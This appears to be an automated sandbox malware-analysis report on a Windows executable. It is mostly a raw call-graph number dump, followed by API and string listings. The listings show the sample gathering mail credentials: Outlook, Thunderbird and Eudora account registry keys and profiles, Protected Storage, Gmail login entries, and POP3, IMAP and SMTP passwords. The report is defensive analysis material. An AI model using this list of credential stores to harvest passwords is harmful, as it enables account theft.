RegEnumKeyExA 33782->33964 33785 4082a2 RegCloseKey 33785->33782 33965 4045db 33786->33965 33788 4088ef 33973 404656 33788->33973 33792 408737 wcslen 33792->33788 33798 40876a 33792->33798 33793 40877a _wcsncoll 33793->33798 33795 404734 3 API calls 33795->33798 33796 404785 FreeLibrary 33796->33798 33797 408812 memset 33797->33798 33799 40883c memcpy wcschr 33797->33799 33798->33788 33798->33793 33798->33795 33798->33796 33798->33797 33798->33799 33800 4088c3 LocalFree 
33798->33800 33976 40466b _mbscpy 33798->33976 33799->33798 33800->33798 33801 410a9c RegOpenKeyExA 33801->33693 33802->33697 33977 410a9c RegOpenKeyExA 33803->33977 33805 402c7a 33806 402da5 33805->33806 33807 402c87 memset 33805->33807 33806->33702 33978 410b62 RegEnumKeyExA 33807->33978 33809 402d9c RegCloseKey 33809->33806 33810 410b1e 3 API calls 33811 402ce4 memset sprintf 33810->33811 33979 410a9c RegOpenKeyExA 33811->33979 33813 402d28 33814 402d3a sprintf 33813->33814 33982 402bd1 40 API calls 33813->33982 33980 410a9c RegOpenKeyExA 33814->33980 33819 402cb2 33819->33809 33819->33810 33820 402d9a 33819->33820 33981 410b62 RegEnumKeyExA 33819->33981 33983 402bd1 40 API calls 33819->33983 33820->33809 33821->33705 33984 410b62 RegEnumKeyExA 33822->33984 33824 402bbb RegCloseKey 33824->33706 33825 406f06 2 API calls 33827 402b58 33825->33827 33827->33824 33827->33825 33830 402bb8 33827->33830 33985 410a9c RegOpenKeyExA 33827->33985 33986 402a9d memset 33827->33986 33994 410b62 RegEnumKeyExA 33827->33994 33830->33824 33831->33709 33832->33713 34034 410a9c RegOpenKeyExA 33833->34034 33835 402ff9 33836 403006 memset 33835->33836 33837 40312c 33835->33837 34035 410b62 RegEnumKeyExA 33836->34035 33837->33722 33839 403122 RegCloseKey 33839->33837 33840 410b1e 3 API calls 33841 403058 memset sprintf 33840->33841 34036 410a9c RegOpenKeyExA 33841->34036 33843 4030a2 memset 34037 410b62 RegEnumKeyExA 33843->34037 33845 410b62 RegEnumKeyExA 33848 403033 33845->33848 33846 4030f9 RegCloseKey 33846->33848 33848->33839 33848->33840 33848->33843 33848->33845 33848->33846 34038 402db3 26 API calls 33848->34038 33850 4032d5 33849->33850 33851 4033a9 33849->33851 34039 4021b6 memset 33850->34039 33864 4034e4 memset memset 33851->33864 33853 4032e1 34040 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->34040 33855 4032ea 33856 4032f8 memset GetPrivateProfileSectionA 33855->33856 34041 4023e5 16 API calls 33855->34041 33856->33851 33861 40332f 33856->33861 
33858 40339b strlen 33858->33851 33858->33861 33860 403350 strchr 33860->33861 33861->33851 33861->33858 34042 4021b6 memset 33861->34042 34043 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33861->34043 34044 4023e5 16 API calls 33861->34044 33865 410b1e 3 API calls 33864->33865 33866 40353f 33865->33866 33867 40357f 33866->33867 33868 403546 _mbscpy 33866->33868 33872 403985 33867->33872 34045 406d55 strlen _mbscat 33868->34045 33870 403565 _mbscat 34046 4033f0 19 API calls 33870->34046 34047 40466b _mbscpy 33872->34047 33876 4039aa 33878 4039ff 33876->33878 34048 40f460 memset memset 33876->34048 34069 40f6e2 33876->34069 34085 4038e8 21 API calls 33876->34085 33879 404785 FreeLibrary 33878->33879 33880 403a0b 33879->33880 33881 4037ca memset memset 33880->33881 34093 444551 memset 33881->34093 33883 4038e2 33883->33732 33944 40f334 334 API calls 33883->33944 33886 40382e 33887 406f06 2 API calls 33886->33887 33888 403843 33887->33888 33889 406f06 2 API calls 33888->33889 33890 403855 strchr 33889->33890 33891 403884 _mbscpy 33890->33891 33892 403897 strlen 33890->33892 33893 4038bf _mbscpy 33891->33893 33892->33893 33894 4038a4 sprintf 33892->33894 34105 4023e5 16 API calls 33893->34105 33894->33893 33897 44b090 33896->33897 33898 40fb10 RegOpenKeyExA 33897->33898 33899 403e7f 33898->33899 33900 40fb3b RegOpenKeyExA 33898->33900 33910 40f96c 33899->33910 33901 40fb55 RegQueryValueExA 33900->33901 33902 40fc2d RegCloseKey 33900->33902 33903 40fc23 RegCloseKey 33901->33903 33904 40fb84 33901->33904 33902->33899 33903->33902 33905 404734 3 API calls 33904->33905 33906 40fb91 33905->33906 33906->33903 33907 40fc19 LocalFree 33906->33907 33908 40fbdd memcpy memcpy 33906->33908 33907->33903 34110 40f802 11 API calls 33908->34110 33911 4070ae GetVersionExA 33910->33911 33912 40f98d 33911->33912 33913 4045db 7 API calls 33912->33913 33921 40f9a9 33913->33921 33914 40fae6 33915 404656 FreeLibrary 33914->33915 33916 403e85 33915->33916 33922 4442ea memset 
33916->33922 33917 40fa13 memset WideCharToMultiByte 33918 40fa43 _strnicmp 33917->33918 33917->33921 33919 40fa5b WideCharToMultiByte 33918->33919 33918->33921 33920 40fa88 WideCharToMultiByte 33919->33920 33919->33921 33920->33921 33921->33914 33921->33917 33923 410dbb 10 API calls 33922->33923 33924 444329 33923->33924 34111 40759e strlen strlen 33924->34111 33929 410dbb 10 API calls 33930 444350 33929->33930 33931 40759e 3 API calls 33930->33931 33932 44435a 33931->33932 33933 444212 65 API calls 33932->33933 33934 444366 memset memset 33933->33934 33935 410b1e 3 API calls 33934->33935 33936 4443b9 ExpandEnvironmentStringsA strlen 33935->33936 33937 4443f4 _strcmpi 33936->33937 33938 4443e5 33936->33938 33939 403e91 33937->33939 33940 44440c 33937->33940 33938->33937 33939->33504 33941 444212 65 API calls 33940->33941 33941->33939 33942->33694 33943->33698 33944->33732 33945->33734 33947 40370e 33946->33947 33948 41088d 33946->33948 33947->33745 33947->33749 33948->33947 33949 4108be memcpy CoTaskMemFree 33948->33949 33949->33947 33950->33752 33951->33745 33953 40841c 33952->33953 33954 410a9c RegOpenKeyExA 33953->33954 33954->33761 33955->33767 33956->33767 33957->33771 33958->33773 33959->33767 33960->33776 33961->33782 33962->33782 33963->33785 33964->33782 33966 404656 FreeLibrary 33965->33966 33967 4045e3 LoadLibraryA 33966->33967 33968 404651 33967->33968 33969 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33967->33969 33968->33788 33968->33792 33970 40463d 33969->33970 33971 404643 33970->33971 33972 404656 FreeLibrary 33970->33972 33971->33968 33972->33968 33974 403cd2 33973->33974 33975 40465c FreeLibrary 33973->33975 33974->33801 33975->33974 33976->33798 33977->33805 33978->33819 33979->33813 33980->33819 33981->33819 33982->33814 33983->33819 33984->33827 33985->33827 33995 410b62 RegEnumKeyExA 33986->33995 33988 402b15 RegCloseKey 33988->33827 33992 402ad0 33992->33988 33993 402b14 33992->33993 33996 410a9c 
RegOpenKeyExA 33992->33996 33997 402a14 memset 33992->33997 34005 410b62 RegEnumKeyExA 33992->34005 33993->33988 33994->33827 33995->33992 33996->33992 34006 410b62 RegEnumKeyExA 33997->34006 33999 402a93 RegCloseKey 33999->33992 34001 402a48 34001->33999 34007 410a9c RegOpenKeyExA 34001->34007 34008 4027be 34001->34008 34023 410b62 RegEnumKeyExA 34001->34023 34005->33992 34006->34001 34007->34001 34009 40285a memset 34008->34009 34024 4029a2 RegQueryValueExA 34009->34024 34011 402885 34011->34009 34012 402998 RegCloseKey 34011->34012 34030 4021b6 memset 34011->34030 34012->34001 34014 402898 _mbscpy 34015 4029a2 4 API calls 34014->34015 34019 4028d4 34015->34019 34016 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34016->34019 34017 410ab6 RegQueryValueExA 34017->34019 34019->34016 34019->34017 34031 401989 _mbscpy _mbscat _mbscat 34019->34031 34032 402624 10 API calls 34019->34032 34021 40296d _mbscpy 34033 4023e5 16 API calls 34021->34033 34023->34001 34025 4029dd 34024->34025 34029 4029f2 34024->34029 34026 4029f7 WideCharToMultiByte 34025->34026 34027 4029e9 34025->34027 34026->34029 34028 406f06 2 API calls 34027->34028 34028->34029 34029->34011 34030->34014 34031->34019 34032->34021 34033->34011 34034->33835 34035->33848 34036->33848 34037->33848 34038->33848 34039->33853 34040->33855 34041->33856 34042->33860 34043->33861 34044->33861 34045->33870 34046->33867 34047->33876 34086 4078ba 34048->34086 34051 4078ba _mbsnbcat 34052 40f5a3 RegOpenKeyExA 34051->34052 34053 40f5c3 RegQueryValueExA 34052->34053 34054 40f6d9 34052->34054 34055 40f6d0 RegCloseKey 34053->34055 34056 40f5f0 34053->34056 34054->33876 34055->34054 34056->34055 34057 40f675 34056->34057 34090 40466b _mbscpy 34056->34090 34057->34055 34091 4012ee strlen 34057->34091 34059 40f611 34061 404734 3 API calls 34059->34061 34066 40f616 34061->34066 34062 40f69e RegQueryValueExA 34062->34055 34063 40f6c1 34062->34063 34063->34055 34064 40f66a 34065 404785 FreeLibrary 34064->34065 
34065->34057 34066->34064 34067 40f661 LocalFree 34066->34067 34068 40f645 memcpy 34066->34068 34067->34064 34068->34067 34092 40466b _mbscpy 34069->34092 34071 40f6fa 34072 4045db 7 API calls 34071->34072 34073 40f708 34072->34073 34074 404734 3 API calls 34073->34074 34079 40f7e2 34073->34079 34080 40f715 34074->34080 34075 404656 FreeLibrary 34076 40f7f1 34075->34076 34077 404785 FreeLibrary 34076->34077 34078 40f7fc 34077->34078 34078->33876 34079->34075 34080->34079 34081 40f797 WideCharToMultiByte 34080->34081 34082 40f7b8 strlen 34081->34082 34083 40f7d9 LocalFree 34081->34083 34082->34083 34084 40f7c8 _mbscpy 34082->34084 34083->34079 34084->34083 34085->33876 34087 4078e6 34086->34087 34088 4078c7 _mbsnbcat 34087->34088 34089 4078ea 34087->34089 34088->34087 34089->34051 34090->34059 34091->34062 34092->34071 34106 410a9c RegOpenKeyExA 34093->34106 34095 40381a 34095->33883 34104 4021b6 memset 34095->34104 34096 44458b 34096->34095 34107 410add RegQueryValueExA 34096->34107 34098 4445a4 34099 4445dc RegCloseKey 34098->34099 34108 410add RegQueryValueExA 34098->34108 34099->34095 34101 4445c1 34101->34099 34109 444879 30 API calls 34101->34109 34103 4445da 34103->34099 34104->33886 34105->33883 34106->34096 34107->34098 34108->34101 34109->34103 34110->33907 34112 4075c9 34111->34112 34113 4075bb _mbscat 34111->34113 34114 444212 34112->34114 34113->34112 34130 407e9d 34114->34130 34117 44424d 34118 444274 34117->34118 34138 444196 34117->34138 34149 407ef8 34117->34149 34119 407e9d 9 API calls 34118->34119 34126 4442a0 34119->34126 34121 407ef8 9 API calls 34121->34126 34122 4442ce 34163 407f90 34122->34163 34126->34121 34126->34122 34128 444212 65 API calls 34126->34128 34159 407e62 34126->34159 34127 407f90 FindClose 34129 4442e4 34127->34129 34128->34126 34129->33929 34131 407f90 FindClose 34130->34131 34132 407eaa 34131->34132 34133 406f06 2 API calls 34132->34133 34134 407ebd strlen strlen 34133->34134 34135 407ee1 34134->34135 34136 407eea 
34134->34136 34166 4070e3 strlen _mbscat _mbscpy _mbscat 34135->34166 34136->34117 34167 406d01 CreateFileA 34138->34167 34140 4441a1 34141 44420e 34140->34141 34142 4441aa GetFileSize 34140->34142 34141->34117 34143 444203 CloseHandle 34142->34143 34144 4441bd ??2@YAPAXI SetFilePointer 34142->34144 34143->34141 34168 407560 ReadFile 34144->34168 34146 4441e4 34169 444059 34146->34169 34150 407f03 FindFirstFileA 34149->34150 34151 407f24 FindNextFileA 34149->34151 34152 407f3f 34150->34152 34153 407f46 strlen strlen 34151->34153 34154 407f3a 34151->34154 34152->34153 34157 407f7f 34152->34157 34155 407f76 34153->34155 34153->34157 34156 407f90 FindClose 34154->34156 34200 4070e3 strlen _mbscat _mbscpy _mbscat 34155->34200 34156->34152 34157->34117 34160 407e94 34159->34160 34161 407e6c strcmp 34159->34161 34160->34126 34161->34160 34162 407e83 strcmp 34161->34162 34162->34160 34164 407fa3 34163->34164 34165 407f99 FindClose 34163->34165 34164->34127 34165->34164 34166->34136 34167->34140 34168->34146 34170 44b090 34169->34170 34171 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34170->34171 34184 44338b 6 API calls 34171->34184 34173 44409f 34174 4440bf strlen 34173->34174 34185 4434fc ??3@YAXPAX ??2@YAPAXI 34174->34185 34176 4440df memcpy 34186 443607 34176->34186 34178 44413d ??3@YAXPAX 34196 443473 9 API calls 34178->34196 34181 406f06 2 API calls 34181->34178 34183 44418f ??3@YAXPAX 34183->34143 34184->34173 34185->34176 34197 407948 ??3@YAXPAX ??3@YAXPAX 34186->34197 34188 443639 34198 407948 ??3@YAXPAX ??3@YAXPAX 34188->34198 34190 44391c 34190->34178 34190->34181 34191 407a1f 4 API calls 34193 443644 34191->34193 34192 443528 19 API calls 34192->34193 34193->34190 34193->34191 34193->34192 34194 44379d memcpy 34193->34194 34199 442d8e 9 API calls 34193->34199 34194->34193 34196->34183 34197->34188 34198->34193 34199->34193 34200->34157 34201->33519 34202->33523 34203->33530 34204->33529 34205->33536 34206->33533 34207->33528 34209 404785 FreeLibrary 
34208->34209 34210 4041b3 34209->34210 34211 410808 FreeLibrary 34210->34211 34212 4041c4 34211->34212 34213 404785 FreeLibrary 34212->34213 34214 4041df 34213->34214 34219 404104 34214->34219 34218 4041eb ??3@YAXPAX 34218->33539 34220 4080d4 ??3@YAXPAX 34219->34220 34221 404111 34220->34221 34222 4080d4 ??3@YAXPAX 34221->34222 34223 40411c 34222->34223 34250 4078ed 34223->34250 34228 404143 34230 407a55 ??3@YAXPAX 34228->34230 34229 404135 SetCurrentDirectoryA 34229->34228 34231 40414b 34230->34231 34232 407a55 ??3@YAXPAX 34231->34232 34233 404153 34232->34233 34234 409a98 34233->34234 34235 409a32 5 API calls 34234->34235 34236 409aa6 34235->34236 34237 409ab9 34236->34237 34238 407a55 ??3@YAXPAX 34236->34238 34240 407a55 ??3@YAXPAX 34237->34240 34241 409acc 34237->34241 34239 409ab2 ??3@YAXPAX 34238->34239 34239->34237 34244 409ac5 ??3@YAXPAX 34240->34244 34242 409adf 34241->34242 34245 407a55 ??3@YAXPAX 34241->34245 34243 409af2 ??3@YAXPAX 34242->34243 34246 407a55 ??3@YAXPAX 34242->34246 34243->34218 34244->34241 34247 409ad8 ??3@YAXPAX 34245->34247 34248 409aeb ??3@YAXPAX 34246->34248 34247->34242 34248->34243 34251 40412a 34250->34251 34252 4078f3 ??3@YAXPAX 34250->34252 34253 404a3a 34251->34253 34252->34251 34254 404a41 34253->34254 34255 40412f 34253->34255 34258 4047cb 11 API calls 34254->34258 34255->34228 34255->34229 34257 404a4c 34257->34255 34258->34257 34267 411853 RtlInitializeCriticalSection memset 34268 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34443 40a256 13 API calls 34445 432e5b 17 API calls 34447 43fa5a 20 API calls 34270 401060 41 API calls 34450 427260 CloseHandle memset memset 34274 410c68 FindResourceA SizeofResource LoadResource LockResource 34452 405e69 14 API calls 34276 433068 15 API calls __fprintf_l 34454 414a6d 18 API calls 34455 43fe6f 134 API calls 34278 424c6d 15 API calls __fprintf_l 34456 426741 19 API calls 34280 440c70 17 API calls 34281 443c71 44 API calls 34284 427c79 24 API calls 
34459 416e7e memset __fprintf_l 34288 42800b 47 API calls 34289 425115 85 API calls __fprintf_l 34462 41960c 61 API calls 34290 43f40c 122 API calls __fprintf_l 34293 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34294 43f81a 20 API calls 34296 414c20 memset memset 34297 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34466 414625 18 API calls 34467 404225 modf 34468 403a26 strlen WriteFile 34470 40422a 12 API calls 34474 427632 memset memset memcpy 34475 40ca30 59 API calls 34476 404235 26 API calls 34298 42ec34 61 API calls __fprintf_l 34299 425115 76 API calls __fprintf_l 34477 425115 77 API calls __fprintf_l 34479 44223a 38 API calls 34305 43183c 112 API calls 34480 44b2c5 _onexit __dllonexit 34485 42a6d2 memcpy __allrem 34307 405cda 66 API calls 34493 43fedc 138 API calls 34494 4116e1 16 API calls __fprintf_l 34310 4244e6 19 API calls 34312 42e8e8 127 API calls __fprintf_l 34313 4118ee RtlLeaveCriticalSection 34499 43f6ec 22 API calls 34315 425115 119 API calls __fprintf_l 34316 410cf3 EnumResourceNamesA 34502 4492f0 memcpy memcpy 34504 43fafa 18 API calls 34506 4342f9 15 API calls __fprintf_l 34317 4144fd 19 API calls 34508 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34509 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34512 443a84 _mbscpy 34514 43f681 17 API calls 34320 404487 22 API calls 34516 415e8c 16 API calls __fprintf_l 34324 411893 RtlDeleteCriticalSection __fprintf_l 34325 41a492 42 API calls 34520 403e96 34 API calls 34521 410e98 memset SHGetPathFromIDList SendMessageA 34327 426741 109 API calls __fprintf_l 34328 4344a2 18 API calls 34329 4094a2 10 API calls 34524 4116a6 15 API calls __fprintf_l 34525 43f6a4 17 API calls 34526 440aa3 20 API calls 34528 427430 45 API calls 34332 4090b0 7 API calls 34333 4148b0 15 API calls 34335 4118b4 RtlEnterCriticalSection 34336 4014b7 CreateWindowExA 34337 40c8b8 19 API calls 34339 4118bf RtlTryEnterCriticalSection 34533 42434a 18 API calls 
(Call-graph dump continues: node IDs, function addresses, per-node API call counts and edges are not reproduced here. Nodes of note in this portion: 0x44b3cf, which reaches two consecutive VirtualProtect calls at 0x44b435 and 0x44b444; 0x410be6 WritePrivateProfileStringA/GetPrivateProfileStringA; 0x410b92 -> 0x410a6b GetPrivateProfileIntA -> 0x410983 memset/_itoa/WritePrivateProfileStringA; 0x410bbc -> 0x4109cf GetPrivateProfileStringA/WritePrivateProfileStringA with strtoul at 0x40737c; 0x4117c8 InterlockedCompareExchange/RtlInitializeCriticalSection; 0x40176c ExitProcess; 0x444dd7 _XcptFilter; 0x444deb _exit/_c_exit; 0x40b5bf memset/memset/_mbsicmp.)

                          Control-flow Graph: function 0x4082cd-0x408488 (executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                          • memset.MSVCRT ref: 0040832F
                          • memset.MSVCRT ref: 00408343
                          • memset.MSVCRT ref: 0040835F
                          • memset.MSVCRT ref: 00408376
                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                          • strlen.MSVCRT ref: 004083E9
                          • strlen.MSVCRT ref: 004083F8
                          • memcpy.MSVCRT ref: 0040840A
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                          • String ID: 5$H$O$b$i$}$}
                          • API String ID: 1832431107-3760989150
                          • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                          • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                          APIs
                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                          • strlen.MSVCRT ref: 00407F5C
                          • strlen.MSVCRT ref: 00407F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileFindstrlen$FirstNext
                          • String ID: ACD
                          • API String ID: 379999529-620537770
                          • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                          • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00401E8B
                            • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                          • strlen.MSVCRT ref: 00401EA4
                          • strlen.MSVCRT ref: 00401EB2
                          • strlen.MSVCRT ref: 00401EF8
                          • strlen.MSVCRT ref: 00401F06
                          • memset.MSVCRT ref: 00401FB1
                          • atoi.MSVCRT ref: 00401FE0
                          • memset.MSVCRT ref: 00402003
                          • sprintf.MSVCRT ref: 00402030
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • memset.MSVCRT ref: 00402086
                          • memset.MSVCRT ref: 0040209B
                          • strlen.MSVCRT ref: 004020A1
                          • strlen.MSVCRT ref: 004020AF
                          • strlen.MSVCRT ref: 004020E2
                          • strlen.MSVCRT ref: 004020F0
                          • memset.MSVCRT ref: 00402018
                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                          • _mbscpy.MSVCRT ref: 00402177
                          • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                          • API String ID: 52128907-4223776976
                          • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                          • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00402869
                            • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                          • _mbscpy.MSVCRT ref: 004028A3
                            • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                          • _mbscpy.MSVCRT ref: 0040297B
                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                          • API String ID: 1497257669-167382505
                          • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                          • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                          • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                          • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                          • DeleteObject.GDI32(?), ref: 0040D1A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                          • API String ID: 745651260-375988210
                          • Opcode ID: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                          • Opcode Fuzzy Hash: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                          • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                          • _mbscpy.MSVCRT ref: 00403E54
                          Strings
                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                          • pstorec.dll, xrefs: 00403C30
                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                          • PStoreCreateInstance, xrefs: 00403C44
                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc_mbscpy
                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                          • API String ID: 1197458902-317895162
                          • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                          • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                          Control-flow Graph: CRT entry function 0x444c4a-0x444e0f (runtime initialisation via __set_app_type/__getmainargs/_initterm, GetStartupInfoA, then GetModuleHandleA and a call into 0x40cf44; executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
